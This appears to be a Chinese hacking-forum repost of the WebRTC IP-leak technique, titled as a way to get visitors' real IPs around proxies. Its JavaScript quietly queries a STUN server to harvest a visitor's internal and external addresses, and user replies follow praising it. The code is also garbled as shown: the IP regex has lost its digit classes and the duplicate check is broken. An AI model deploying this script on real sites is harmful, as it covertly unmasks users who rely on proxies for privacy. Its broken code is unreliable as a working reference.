绕过代理获取访客真实IP
FROM:http://zone.wooyun.org/content/18274from:https://github.com/diafygi/webrtc-ips
Firefox 跟 Chrome支持WebRTC可以向STUN服务器请求,返回内外网IP,不同于XMLHttpRequest请求,STUN请求开发者工具当中看不到网络请求的。
演示链接
//get the IP addresses associated with an account
function getIPs(callback){
var ip_dups = {};
//compatibility for firefox and chrome
var RTCPeerConnection = window.RTCPeerConnection
|| window.mozRTCPeerConnection
|| window.webkitRTCPeerConnection;
var mediaConstraints = {
optional: [{RtpDataChannels: true}]
};
//firefox already has a default stun server in about:config
// media.peerconnection.default_iceservers =
// [{"url": "stun:stun.services.mozilla.com"}]
var servers = undefined;
//add same stun server for chrome
if(window.webkitRTCPeerConnection)
servers = {iceServers: [{urls: "stun:stun.services.mozilla.com"}]};
//construct a new RTCPeerConnection
var pc = new RTCPeerConnection(servers, mediaConstraints);
//listen for candidate events
pc.onicecandidate = function(ice){
//skip non-candidate events
if(ice.candidate){
//match just the IP address
var ip_regex = /({1,3}(\.{1,3}){3})/
var ip_addr = ip_regex.exec(ice.candidate.candidate);
//remove duplicates
if(ip_dups === undefined)
callback(ip_addr);
ip_dups = true;
}
};
//create a bogus data channel
pc.createDataChannel("");
//create an offer sdp
pc.createOffer(function(result){
//trigger the stun server request
pc.setLocalDescription(result, function(){});
}, function(){});
}
//Test: Print the IP addresses into the console
getIPs(function(ip){console.log(ip);}); 感谢分享:) 哇哦,是之前鸡鸡说的 开了http代理跟没开一样。原来是这样, 虽然没怎么看懂,收藏 以后慢慢看,。 支持中国红客联盟(ihonker.org) 感谢楼主的分享~ 支持中国红客联盟(ihonker.org) 支持,看起来不错呢! 感谢楼主的分享~